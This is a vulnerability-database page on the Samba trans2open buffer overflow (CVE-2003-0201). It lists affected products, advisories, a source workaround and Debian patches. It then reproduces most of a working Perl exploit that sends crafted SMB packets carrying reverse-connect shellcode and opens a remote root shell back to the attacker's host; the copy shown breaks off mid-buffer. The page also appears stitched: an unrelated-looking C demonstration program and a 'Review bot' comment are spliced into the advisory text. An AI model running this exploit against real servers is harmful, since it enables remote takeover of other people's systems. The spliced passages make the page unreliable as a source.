CVE-2003-0201
CVSS 10.0
Published: 2003-05-05 00:00:00
Revised: 2016-10-17 22:30:33

[Original] Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions, and Samba-TNG before 0.3.2, allows remote attackers to execute arbitrary code.


[CNNVD] Samba Server call_trans2open Remote Buffer Overflow Vulnerability (CNNVD-200305-012)

        
        Samba is a suite of programs that implements the SMB (Server Message Block) protocol to provide cross-platform file and print sharing. Samba-TNG is a derivative of Samba.
        Because Samba does not properly bounds-check external input, a remote attacker can exploit this vulnerability to execute arbitrary instructions on the system with root privileges.
        The problem is the following call in the call_trans2open() function in smbd/trans2.c:
        StrnCpy(fname,pname,namelen); /* Line 252 of smbd/trans2.c */
        StrnCpy copies pname into fname using namelen as the length; because namelen is set to strlen(pname)+1, a buffer overflow occurs. The variable 'fname' is of the typedef type pstring, a 1024-byte character array. If pname exceeds 1024 bytes, it can overwrite sensitive addresses on the stack, and carefully crafted data may lead to execution of arbitrary instructions on the system with root privileges.
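The defect above is a length-bounded copy whose length comes from the input itself, so the bound is no bound at all. As an added illustration (not code from Samba, the advisory or CNNVD), the following C program models that pattern and the remedy the advisory's workaround applies, a cap of MIN(namelen, sizeof(fname)-1): a destination of the 1024-byte pstring size, a StrnCpy-style helper that copies n bytes and then writes a terminator at dest[n], a check that reports whether a given namelen would push that terminator past the buffer, and the capped copy. The buffer size is taken from the description; the helper names (`model_strncpy`, `trans2_copy_would_overflow`, `trans2_copy_bounded`, `demo`) and the constructed 2000-character name are assumptions for the demonstration. The program never performs the unchecked write; it only computes that it would be out of bounds and then does the safe copy.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumption from the description: Samba's pstring is a fixed 1024-byte
 * char array. */
#define PSTRING_LEN 1024
typedef char pstring[PSTRING_LEN];

#ifndef MIN
#define MIN(a, b) ((a) < (b) ? (a) : (b))
#endif

/* Model of a StrnCpy-style helper (constructed for this example, not
 * Samba's own): copies up to n bytes of src, then writes a terminating
 * NUL at dest[n]. Because of that trailing write the caller must pass
 * n <= sizeof(dest) - 1 for the whole operation to stay in bounds. */
static char *model_strncpy(char *dest, const char *src, size_t n)
{
    size_t i;
    for (i = 0; i < n && src[i] != '\0'; i++)
        dest[i] = src[i];
    dest[i] = '\0';
    return dest;
}

/* Returns 1 when copying with this namelen into a buffer of bufsize bytes
 * would write past its end. The unchecked path used namelen ==
 * strlen(pname) + 1, so a name that fills the buffer already places the
 * terminator one byte beyond it. */
int trans2_copy_would_overflow(size_t namelen, size_t bufsize)
{
    return namelen > bufsize - 1;
}

/* The capped copy from the workaround. Note sizeof(pstring), not
 * sizeof(fname): as a parameter, fname has decayed to a pointer, and
 * sizeof(fname) would yield the pointer size. Inside call_trans2open()
 * fname is a local array, which is why sizeof(fname)-1 works there.
 * Returns the number of characters stored, excluding the terminator. */
size_t trans2_copy_bounded(pstring fname, const char *pname, size_t namelen)
{
    model_strncpy(fname, pname, MIN(namelen, sizeof(pstring) - 1));
    return strlen(fname);
}

/* Runs both checks on a constructed oversize name. Returns 1 when the
 * unchecked length is flagged and the bounded copy stays inside fname. */
int demo(void)
{
    enum { NAME_LEN = 2000 };             /* constructed oversize input */
    char *pname = malloc(NAME_LEN + 1);
    pstring fname;
    size_t namelen, stored;
    int overflow;

    if (pname == NULL)
        return -1;
    memset(pname, 'A', NAME_LEN);
    pname[NAME_LEN] = '\0';

    namelen = strlen(pname) + 1;          /* the value the vulnerable code used */
    overflow = trans2_copy_would_overflow(namelen, sizeof(pstring));
    stored = trans2_copy_bounded(fname, pname, namelen);

    printf("namelen=%zu would overflow a %zu-byte pstring: %s\n",
           namelen, sizeof(pstring), overflow ? "yes" : "no");
    printf("bounded copy stored %zu chars, terminator at index %zu\n",
           stored, stored);

    free(pname);
    return overflow && stored == PSTRING_LEN - 1 && fname[stored] == '\0';
}

int main(void)
{
    return demo() == 1 ? 0 : 1;
}
```

The cap keeps the copy inside the buffer but silently truncates long names; a server-side length check that rejects (rather than shortens) an out-of-range name is the stricter choice where the protocol allows it.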
        

- CVSS (Base Score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)

cpe:/a:samba:samba:2.2.0a  Samba Samba 2.2.0a
cpe:/o:sun:solaris:9.0::x86
cpe:/o:compaq:tru64:4.0f_pk7_bl18  Compaq Tru64 4.0f PK7_BL18
cpe:/o:sun:solaris:7.0::x86
cpe:/a:hp:cifs-9000_server:a.01.08.01  HP CIFS_9000 Server A.01.08.01
cpe:/o:sun:solaris:2.5.1::ppc
cpe:/o:compaq:tru64:5.1_pk5_bl19  Compaq Tru64 5.1 PK5_BL19
cpe:/o:compaq:tru64:5.1a_pk1_bl1  Compaq Tru64 5.1a PK1_BL1
cpe:/o:compaq:tru64:4.0g_pk3_bl17  Compaq Tru64 4.0g PK3_BL17
cpe:/o:sun:solaris:2.6
cpe:/o:sun:solaris:8.0
cpe:/o:sun:solaris:2.5.1::x86
cpe:/o:apple:mac_os_x:10.2.3  Apple Mac OS X 10.2.3
cpe:/o:hp:hp-ux:11.11  HP-UX 11.11
cpe:/o:apple:mac_os_x:10.2.2  Apple Mac OS X 10.2.2
cpe:/a:samba:samba:2.0.10  Samba 2.0.10
cpe:/o:apple:mac_os_x:10.2.1  Apple Mac OS X 10.2.1
cpe:/o:hp:hp-ux:10.24  HP HP-UX 10.24
cpe:/a:samba:samba:2.2.1a  Samba Samba 2.2.1a
cpe:/o:sun:solaris:2.5.1
cpe:/a:samba-tng:samba-tng:0.3.1  Samba-TNG Samba-TNG 0.3.1
cpe:/o:compaq:tru64:4.0d_pk9_bl17  Compaq Tru64 4.0d PK9_BL17
cpe:/o:compaq:tru64:5.0a_pk3_bl17  Compaq Tru64 5.0a PK3_BL17
cpe:/a:hp:cifs-9000_server:a.01.08  HP CIFS_9000 Server A.01.08
cpe:/a:hp:cifs-9000_server:a.01.05  HP CIFS_9000 Server A.01.05
cpe:/o:compaq:tru64:5.0f  Compaq Tru64 5.0f
cpe:/a:hp:cifs-9000_server:a.01.07  HP CIFS_9000 Server A.01.07
cpe:/o:compaq:tru64:5.0a  Compaq Tru64 5.0a
cpe:/a:hp:cifs-9000_server:a.01.06  HP CIFS_9000 Server A.01.06
cpe:/o:sun:solaris:9.0::sparc
cpe:/a:samba:samba:2.2.8  Samba 2.2.8
cpe:/o:compaq:tru64:4.0f_pk6_bl17  Compaq Tru64 4.0f PK6_BL17
cpe:/o:hp:hp-ux:11.22  HP-UX 11i v1.6
cpe:/o:hp:hp-ux:11.20  HP-UX 11i v1.5
cpe:/a:hp:cifs-9000_server:a.01.09  HP CIFS_9000 Server A.01.09
cpe:/o:sun:solaris:2.6::x86
cpe:/o:sun:solaris:8.0::x86
cpe:/o:compaq:tru64:5.1_pk3_bl17  Compaq Tru64 5.1 PK3_BL17
cpe:/o:compaq:tru64:4.0f  Compaq Tru64 4.0f
cpe:/o:compaq:tru64:4.0g  Compaq Tru64 4.0g
cpe:/o:sun:solaris:9.0:x86_update_2
cpe:/a:samba:samba:2.0.3  Samba 2.0.3
cpe:/o:compaq:tru64:4.0b  Compaq Tru64 4.0b
cpe:/o:compaq:tru64:5.1b_pk1_bl1  Compaq Tru64 5.1b PK1_BL1
cpe:/a:samba:samba:2.0.2  Samba 2.0.2
cpe:/a:samba:samba:2.2.0  Samba 2.2.0
cpe:/o:apple:mac_os_x:10.2  Apple Mac OS X 10.2
cpe:/a:samba:samba:2.0.5  Samba 2.0.5
cpe:/o:compaq:tru64:4.0d  Compaq Tru64 4.0d
cpe:/o:sun:solaris:7.0
cpe:/a:samba:samba:2.0.4  Samba 2.0.4
cpe:/o:compaq:tru64:5.1a  Compaq Tru64 5.1a
cpe:/a:samba:samba:2.0.1  Samba 2.0.1
cpe:/o:compaq:tru64:5.0_pk4_bl17  Compaq Tru64 5.0 PK4_BL17
cpe:/o:compaq:tru64:5.1b  Compaq Tru64 5.1b
cpe:/a:samba:samba:2.0.0  Samba 2.0.0
cpe:/o:compaq:tru64:5.0_pk4_bl18  Compaq Tru64 5.0 PK4_BL18
cpe:/a:samba:samba:2.2.7a  Samba Samba 2.2.7a
cpe:/a:samba:samba:2.0.7  Samba 2.0.7
cpe:/a:samba:samba:2.2.5  Samba 2.2.5
cpe:/o:hp:hp-ux:10.20  HP HP-UX 10.20
cpe:/a:samba:samba:2.0.6  Samba 2.0.6
cpe:/a:samba:samba:2.2.4  Samba 2.2.4
cpe:/a:samba:samba:2.0.9  Samba 2.0.9
cpe:/a:samba:samba:2.2.7  Samba 2.2.7
cpe:/a:samba:samba:2.0.8  Samba 2.0.8
cpe:/a:samba:samba:2.2.6  Samba 2.2.6
cpe:/o:hp:hp-ux:11.04  HP HP-UX 11.04
cpe:/o:hp:hp-ux:10.01  HP HP-UX 10.01
cpe:/o:compaq:tru64:5.0  Compaq Tru64 5.0
cpe:/a:hp:cifs-9000_server:a.01.09.02  HP CIFS_9000 Server A.01.09.02
cpe:/o:compaq:tru64:5.1a_pk2_bl2  Compaq Tru64 5.1a PK2_BL2
cpe:/o:apple:mac_os_x:10.2.4  Apple Mac OS X 10.2.4
cpe:/o:compaq:tru64:5.1_pk6_bl20  Compaq Tru64 5.1 PK6_BL20
cpe:/a:samba:samba:2.2.3a  Samba Samba 2.2.3a
cpe:/a:hp:cifs-9000_server:a.01.09.01  HP CIFS_9000 Server A.01.09.01
cpe:/o:compaq:tru64:5.1  Compaq Tru64 5.1
cpe:/o:compaq:tru64:5.1a_pk3_bl3  Compaq Tru64 5.1a PK3_BL3
cpe:/o:compaq:tru64:5.1_pk4_bl18  Compaq Tru64 5.1 PK4_BL18
cpe:/a:samba-tng:samba-tng:0.3  Samba-TNG Samba-TNG 0.3
cpe:/o:hp:hp-ux:11.00  HP-UX 11.00

- OVAL (Technical Details for Detection)

oval:org.mitre.oval:def:567  BO in Samba call_trans2open Function
oval:org.mitre.oval:def:2163  Samba call_trans2open() Buffer Overflow
*OVAL describes in detail how to detect this vulnerability; the related OVAL definitions give further technical details on detecting it.

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0201
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0201
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200305-012
(Official data source) CNNVD

- Other Links and Resources

ftp://patches.sgi.com/support/free/security/advisories/20030403-01-P
(UNKNOWN)  SGI  20030403-01-P
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000624
(UNKNOWN)  CONECTIVA  CLA-2003:624
http://marc.info/?l=bugtraq&m=104972664226781&w=2
(UNKNOWN)  BUGTRAQ  20030407 [DDI-1013] Buffer Overflow in Samba allows remote root compromise
http://marc.info/?l=bugtraq&m=104974612519064&w=2
(UNKNOWN)  BUGTRAQ  20030407 Immunix Secured OS 7+ samba update
http://marc.info/?l=bugtraq&m=104981682014565&w=2
(UNKNOWN)  BUGTRAQ  20030408 [Sorcerer-spells] SAMBA--SORCERER2003-04-08
http://marc.info/?l=bugtraq&m=104994564212488&w=2
(UNKNOWN)  BUGTRAQ  20030409 GLSA: samba (200304-02)
http://www.debian.org/security/2003/dsa-280
(VENDOR_ADVISORY)  DEBIAN  DSA-280
http://www.digitaldefense.net/labs/advisories/DDI-1013.txt
(UNKNOWN)  MISC  http://www.digitaldefense.net/labs/advisories/DDI-1013.txt
http://www.kb.cert.org/vuls/id/267873
(UNKNOWN)  CERT-VN  VU#267873
http://www.mandriva.com/security/advisories?name=MDKSA-2003:044
(UNKNOWN)  MANDRAKE  MDKSA-2003:044
http://www.novell.com/linux/security/advisories/2003_025_samba.html
(UNKNOWN)  SUSE  SuSE-SA:2003:025
http://www.redhat.com/support/errata/RHSA-2003-137.html
(UNKNOWN)  REDHAT  RHSA-2003:137
http://www.securityfocus.com/bid/7294
(VENDOR_ADVISORY)  BID  7294

- Vulnerability Information

Samba Server call_trans2open Remote Buffer Overflow Vulnerability
Critical  Boundary condition error
2003-05-05 00:00:00 2005-10-20 00:00:00
Remote
        
        

- Advisories and Patches

        Temporary workaround:
        If you cannot install a patch or upgrade immediately, CNNVD recommends the following measure to reduce the threat:
        * Modify line 250 of smbd/trans2.c:
        -StrnCpy(fname,pname,namelen);
        +StrnCpy(fname,pname,MIN(namelen, sizeof(fname)-1));
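Review bot: the cap `MIN(namelen, sizeof(fname)-1)` is correct only because `fname` is the fixed-size pstring array the description mentions, so `sizeof(fname)` evaluates to the 1024-byte buffer size; were `fname` ever a pointer parameter, `sizeof` would yield the pointer size and every name would be truncated to a few bytes. Writing the bound as `sizeof(pstring)-1` (or a named buffer-size constant) makes that dependency explicit, and the `-1` is needed because StrnCpy writes a terminator at index n after copying n bytes.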
        Vendor patches:
        Debian
        ------
        Debian has released a security advisory (DSA-280-1) and corresponding patches for this issue:
        DSA-280-1: New samba packages fix remote root exploit
        Link:
        http://www.debian.org/security/2002/dsa-280

        Patch download:
        Source archives:
        
        http://security.debian.org/pool/updates/main/s/samba/samba_2.0.7-5.1.dsc

        Size/MD5 checksum: 682 f6408cc26d6825708b42aee5804346aa
        
        http://security.debian.org/pool/updates/main/s/samba/samba_2.0.7-5.1.diff.gz

        Size/MD5 checksum: 84907 aa39196e9842b853e2ca6eccb69a67ee
        
        http://security.debian.org/pool/updates/main/s/samba/samba_2.0.7.orig.tar.gz

        Size/MD5 checksum: 4276392 b5e61ea655d476072fd0365785fea2d0
        Architecture independent components:
        
        http://security.debian.org/pool/updates/main/s/samba/samba-doc_2.0.7-5.1_all.deb

        Size/MD5 checksum: 1730866 e50fbefba3bdf5abeb136484a19cae19
        Alpha architecture:
        
        http://security.debian.org/pool/updates/main/s/samba/samba_2.0.7-5.1_alpha.deb

        Size/MD5 checksum: 1368434 6f5c06a774c9cdf07fe10d739221644f
        
        http://security.debian.org/pool/updates/main/s/samba/samba-common_2.0.7-5.1_alpha.deb

        Size/MD5 checksum: 671138 07967650ed35874384c3cdf6f630f024
        
        http://security.debian.org/pool/updates/main/s/samba/smbclient_2.0.7-5.1_alpha.deb

        Size/MD5 checksum: 751518 5ca4feb086cdd75e96a76c45ffed0761
        
        http://security.debian.org/pool/updates/main/s/samba/smbfs_2.0.7-5.1_alpha.deb

        Size/MD5 checksum: 464608 1f59a2592e652886f33155f1b177733a
        
        http://security.debian.org/pool/updates/main/s/samba/swat_2.0.7-5.1_alpha.deb

        Size/MD5 checksum: 303764 9d2f4dc0431453363c1ec61f110ebfd5
        ARM architecture:
        
        http://security.debian.org/pool/updates/main/s/samba/samba_2.0.7-5.1_arm.deb

        Size/MD5 checksum: 1128522 3385d1640b33672a960b515a24076f73
        
        http://security.debian.org/pool/updates/main/s/samba/samba-common_2.0.7-5.1_arm.deb

        Size/MD5 checksum: 594892 3b0da8cf9d6baa38be60b20fd40d3e67
        
        http://security.debian.org/pool/updates/main/s/samba/smbclient_2.0.7-5.1_arm.deb

        Size/MD5 checksum: 611464 2d2293eb3af68122af74fce318fe1daf
        
        http://security.debian.org/pool/updates/main/s/samba/smbfs_2.0.7-5.1_arm.deb

        Size/MD5 checksum: 379972 810376b6f2eeb326c8b4077bab9a642d
        
        http://security.debian.org/pool/updates/main/s/samba/swat_2.0.7-5.1_arm.deb

        Size/MD5 checksum: 251962 8add539661bb6cf17feeb141179f5e5e
        Intel IA-32 architecture:
        
        http://security.debian.org/pool/updates/main/s/samba/samba_2.0.7-5.1_i386.deb

        Size/MD5 checksum: 1038178 85520066846690baf161dcd1e109e3b4
        
        http://security.debian.org/pool/updates/main/s/samba/samba-common_2.0.7-5.1_i386.deb

        Size/MD5 checksum: 570658 e7cf4ae028c0e629bf5d4ebd4e762840
        
        http://security.debian.org/pool/updates/main/s/samba/smbclient_2.0.7-5.1_i386.deb

        Size/MD5 checksum: 560702 4b15aab22dc0b5d5d43f3094594261dc
        
        http://security.debian.org/pool/updates/main/s/samba/smbfs_2.0.7-5.1_i386.deb

        Size/MD5 checksum: 351374 7baebac78c9f9db2d474d549193b3229
        
        http://security.debian.org/pool/updates/main/s/samba/swat_2.0.7-5.1_i386.deb

        Size/MD5 checksum: 233416 521feb878fe8c9d0d145cabc98de136f
        Motorola 680x0 architecture:
        
        http://security.debian.org/pool/updates/main/s/samba/samba_2.0.7-5.1_m68k.deb

        Size/MD5 checksum: 993334 465a088df279605a161bceb13d3fadc7
        
        http://security.debian.org/pool/updates/main/s/samba/samba-common_2.0.7-5.1_m68k.deb

        Size/MD5 checksum: 557152 88a5169cabadefcf300d46dff7009535
        
        http://security.debian.org/pool/updates/main/s/samba/smbclient_2.0.7-5.1_m68k.deb

        Size/MD5 checksum: 536528 20e0c945b6b4f26df08a878a93abb260
        
        http://security.debian.org/pool/updates/main/s/samba/smbfs_2.0.7-5.1_m68k.deb

        Size/MD5 checksum: 339706 319d3aba8172f071040a192ee40d0fce
        
        http://security.debian.org/pool/updates/main/s/samba/swat_2.0.7-5.1_m68k.deb

        Size/MD5 checksum: 222556 dbdbac65a0bc736fbed9bcc42c3dabb1
        PowerPC architecture:
        
        http://security.debian.org/pool/updates/main/s/samba/samba_2.0.7-5.1_powerpc.deb

        Size/MD5 checksum: 1124154 e4624fae9942e547c68fcdbfbb88bb7d
        
        http://security.debian.org/pool/updates/main/s/samba/samba-common_2.0.7-5.1_powerpc.deb

        Size/MD5 checksum: 594476 7146e39be6c26d868073b608230bd340
        
        http://security.debian.org/pool/updates/main/s/samba/smbclient_2.0.7-5.1_powerpc.deb

        Size/MD5 checksum: 610070 0e78c52db69ad9b7a52da770e3298878
        
        http://security.debian.org/pool/updates/main/s/samba/smbfs_2.0.7-5.1_powerpc.deb

        Size/MD5 checksum: 382148 5b5cbb24a03eca3ec9b78ae13d4fa614
        
        http://security.debian.org/pool/updates/main/s/samba/swat_2.0.7-5.1_pow

- Vulnerability Information (7)

Samba 2.2.x Remote Root Buffer Overflow Exploit (EDBID:7)
linux remote
2003-04-07 Verified
139 H D Moore
N/A
#!/usr/bin/perl
###############

##[ Header
#         Name:  trans2root.pl
#      Purpose:  Proof of concept exploit for Samba 2.2.x (trans2open overflow)
#       Author:  H D Moore <hdmoore@digitaldefense.net>
#    Copyright:  Copyright (C) 2003 Digital Defense Inc.
#  trans2root.pl <options> -t <target type> -H <your ip> -h <target ip>
##

use strict;
use Socket;
use IO::Socket;
use IO::Select;
use POSIX;
use Getopt::Std;

$SIG{USR2} = \&GoAway;

my %args;
my %targets =
(
    "linx86"  => [0xbffff3ff, 0xbfffffff, 0xbf000000, 512, \&CreateBuffer_linx86],
    "solx86"  => [0x08047404, 0x08047ffc, 0x08010101, 512, \&CreateBuffer_solx86],
    "fbsdx86" => [0xbfbfefff, 0xbfbfffff, 0xbf000000, 512, \&CreateBuffer_bsdx86],
    # name      # default   # start     # end      # step  # function
);

getopt('t:M:h:p:r:H:P:', \%args);

my $target_type = $args{t} || Usage();
my $target_host = $args{h} || Usage();
my $local_host  = $args{H} || Usage();
my $local_port  = $args{P} || 1981;
my $target_port = $args{p} || 139;

my $target_mode = "brute";

if (! exists($targets{$target_type})) { Usage(); }
print "[*] Using target type: $target_type\n";

# allow single mode via the -M option
if ($args{M} && uc($args{M}) eq "S")
{
    $target_mode = "single";
}

# the parent process listens for an incoming connection
# the child process handles the actual exploitation
my $listen_pid = $$;
my $exploit_pid = StartListener($local_port);

# get the default return address for single mode
my $targ_ret = $args{r} || $targets{$target_type}->[0];
my $curr_ret;
$targ_ret = eval($targ_ret);

if ($target_mode !~ /brute|single/)
{
    print "[*] Invalid attack mode: $target_mode (single or brute only)\n";
    exit(0);
}


if ($target_mode eq "single")
{
    $curr_ret = $targ_ret;
    if(! $targ_ret)
    {
       print "[*] Invalid return address specified!\n";
        kill("USR2", $listen_pid);
        exit(0);
    }

    print "[*] Starting single shot mode...\n";
    printf ("[*] Using return address of 0x%.8x\n", $targ_ret);
    my $buf = $targets{$target_type}->[4]->($local_host, $local_port, $targ_ret);
    my $ret = AttemptExploit($target_host, $target_port, $buf);

    sleep(2);
    kill("USR2", $listen_pid);
    exit(0);
}


if ($target_mode eq "brute")
{
    print "[*] Starting brute force mode...\n";

    for (
          $curr_ret  =$targets{$target_type}->[1];
          $curr_ret >= $targets{$target_type}->[2];
          $curr_ret -=$targets{$target_type}->[3]
        )
    {
        select(STDOUT); $|++;
        my $buf = $targets{$target_type}->[4]->($local_host, $local_port, $curr_ret);
        printf ("                                        \r[*] Return Address: 0x%.8x", $curr_ret);
        my $ret = AttemptExploit($target_host, $target_port, $buf);
    }
    sleep(2);
    kill("USR2", $listen_pid);
    exit(0);
}

sub Usage {

    print STDERR "\n";
    print STDERR " trans2root.pl - Samba 2.2.x 'trans2open()' Remote Exploit\n";
    print STDERR "===================================\n\n";
    print STDERR "    Usage: \n";
    print STDERR "           $0 <options> -t <target type> -H <your ip> -h <target ip>\n";
    print STDERR "  Options:  \n";
    print STDERR "           -M (S|B) <single or brute mode>\n";
    print STDERR "           -r       <return address for single mode>\n";
    print STDERR "           -p       <alternate Samba port>\n";
    print STDERR "           -P       <alternate listener port>\n";
    print STDERR "  Targets:\n";
    foreach my $type (keys(%targets))
    {
        print STDERR "            $type\n";
    }
    print STDERR "\n";


    exit(1);
}


sub StartListener {
    my ($local_port) = @_;
    my $listen_pid = $$;

    my $s = IO::Socket::INET->new (
                Proto => "tcp",
                LocalPort => $local_port,
                Type => SOCK_STREAM,
                Listen => 3,
                ReuseAddr => 1
    );

    if (! $s)
    {
        print "[*] Could not start listener: $!\n";
        exit(0);
    }

    print "[*] Listener started on port $local_port\n";

    my $exploit_pid = fork();
    if ($exploit_pid)
    {
        my $victim;
        $SIG{USR2} = \&GoAway;

        while ($victim = $s->accept())
        {
            kill("USR2", $exploit_pid);
            print STDOUT "\n[*] Starting Shell " . $victim->peerhost . ":" . $victim->peerport . "\n\n";
            StartShell($victim);
        }
        exit(0);
    }
    return ($exploit_pid);
}

sub StartShell {
    my ($client) = @_;
    my $sel = IO::Select->new();

    Unblock(*STDIN);
    Unblock(*STDOUT);
    Unblock($client);

    select($client); $|++;
    select(STDIN);   $|++;
    select(STDOUT);  $|++;

    $sel->add($client);
    $sel->add(*STDIN);

    print $client "echo \\-\\-\\=\\[ Welcome to `hostname` \\(`id`\\)\n";
    print $client "echo \n";

    while (fileno($client))
    {
        my $fd;
        my @fds = $sel->can_read(0.2);

        foreach $fd (@fds)
        {
            my @in = <$fd>;

            if(! scalar(@in)) { next; }

            if (! $fd || ! $client)
            {
                print "[*] Closing connection.\n";
                close($client);
                exit(0);
            }

            if ($fd eq $client)
            {
                print STDOUT join("", @in);
            } else {
                print $client join("", @in);
            }
        }
    }
    close ($client);
}

sub AttemptExploit {
    my ($Host, $Port, $Exploit) = @_;
    my $res;

    my $s = IO::Socket::INET->new(PeerAddr => $Host, PeerPort => $Port, Type => SOCK_STREAM, Protocol => "tcp");

    if (! $s)
    {
        print "\n[*] Error: could not connect: $!\n";
        kill("USR2", $listen_pid);
        exit(0);
    }

    select($s); $|++;
    select(STDOUT); $|++;
    Unblock($s);

    my $SetupSession =
        "\x00\x00\x00\x2e\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x08".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01".
        "\x00\x00\x00\x00";

    my $TreeConnect =
        "\x00\x00\x00\x3c\xff\x53\x4d\x42\x70\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x64\x00".
        "\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24".
        "\x25\x6e\x6f\x62\x6f\x64\x79\x00\x00\x00\x00\x00\x00\x00\x49\x50".
        "\x43\x24";

    my $Flush = ("\x00" x 808);

    print $s $SetupSession;
    $res = ReadResponse($s);

    print $s $TreeConnect;
    $res = ReadResponse($s);

    # uncomment this for diagnostics
    #print "[*] Press Enter to Continue...\n";
    #$res = <STDIN>;

    #print "[*] Sending Exploit Buffer...\n";

    print $s $Exploit;
    print $s $Flush;

    ReadResponse($s);
    close($s);
}

sub CreateBuffer_linx86 {
    my ($Host, $Port, $Return) = @_;

    my $RetAddr =  eval($Return);
    $RetAddr = pack("l", $RetAddr);

    my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host));
    $a1 = chr(ord($a1) ^ 0x93);
    $a2 = chr(ord($a2) ^ 0x93);
    $a3 = chr(ord($a3) ^ 0x93);
    $a4 = chr(ord($a4) ^ 0x93);

    my ($p1, $p2) = split(//, reverse(pack("s", $Port)));
    $p1 = chr(ord($p1) ^ 0x93);
    $p2 = chr(ord($p2) ^ 0x93);

    my $exploit =
        # trigger the trans2open overflow
        "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
        "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90".

        GetNops(772) .

        # xor decoder courtesy of hsj
        "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01".
        "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30".
        "\x93\x40\xe2\xfa".

        # reverse-connect, mangled lamagra code + fixes
        "\x1a\x76\xa2\x41\x21\xf5\x1a\x43\xa2\x5a\x1a\x58\xd0\x1a\xce\x6b".
        "\xd0\x1a\xce\x67\xd8\x1a\xde\x6f\x1e\xde\x67\x5e\x13\xa2\x5a\x1a".
        "\xd6\x67\xd0\xf5\x1a\xce\x7f\xf5\x54\xd6\x7d".
        $p1.$p2 ."\x54\xd6\x63". $a1.$a2.$a3.$a4.
        "\x1e\xd6\x7f\x1a\xd6\x6b\x55\xd6\x6f\x83\x1a\x43\xd0\x1e\xde\x67".
        "\x5e\x13\xa2\x5a\x03\x18\xce\x67\xa2\x53\xbe\x52\x6c\x6c\x6c\x5e".
        "\x13\xd2\xa2\x41\x12\x79\x6e\x6c\x6c\x6c\xaa\x42\xe6\x79\x78\x8b".
        "\xcd\x1a\xe6\x9b\xa2\x53\x1b\xd5\x94\x1a\xd6\x9f\x23\x98\x1a\x60".
        "\x1e\xde\x9b\x1e\xc6\x9f\x5e\x13\x7b\x70\x6c\x6c\x6c\xbc\xf1\xfa".
        "\xfd\xbc\xe0\xfb".

        GetNops(87).

        ($RetAddr x 8).

        "DDI!". ("\x00" x 277);

    return $exploit;
}

sub CreateBuffer_solx86 {
    my ($Host, $Port, $Return) = @_;

    my $RetAddr =  eval($Return);
    my $IckAddr = $RetAddr - 512;

    $RetAddr = pack("l", $RetAddr);
    $IckAddr = pack("l", $IckAddr);

    # IckAddr needs to point to a writable piece of memory

    my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host));
    $a1 = chr(ord($a1) ^ 0x93);
    $a2 = chr(ord($a2) ^ 0x93);
    $a3 = chr(ord($a3) ^ 0x93);
    $a4 = chr(ord($a4) ^ 0x93);

    my ($p1, $p2) = split(//, reverse(pack("s", $Port)));
    $p1 = chr(ord($p1) ^ 0x93);
    $p2 = chr(ord($p2) ^ 0x93);

    my $exploit =
        # trigger the trans2open overflow
        "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
        "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90".

        GetNops(813) .

        # xor decoder courtesy of hsj
        "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01".
        "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30".
        "\x93\x40\xe2\xfa".

        # reverse-connect, code by bighawk
        "\x2b\x6c\x6b\x6c\xaf\x64\x43\xc3\xa2\x53\x23\x09\xc3\x1a\x76\xa2".
        "\x5a\xc2\xd2\xd2\xc2\xc2\x23\x75\x6c\x46\xa2\x41\x1a\x54\xfb".
        $a1.$a2.$a3.$a4 ."\xf5\xfb". $p1.$p2.
        "\xf5\xc2\x1a\x75\xf9\x83\xc5\xc4\x23\x78\x6c\x46\xa2\x41\x21\x9a".
        "\xc2\xc1\xc4\x23\xad\x6c\x46\xda\xea\x61\xc3\xfb\xbc\xbc\xe0\xfb".
        "\xfb\xbc\xf1\xfa\xfd\x1a\x70\xc3\xc0\x1a\x71\xc3\xc1\xc0\x23\xa8".
        "\x6c\x46".

        GetNops(87) .

        "010101".
        $RetAddr.
        $IckAddr.
        $RetAddr.
        $IckAddr.
        "101010".

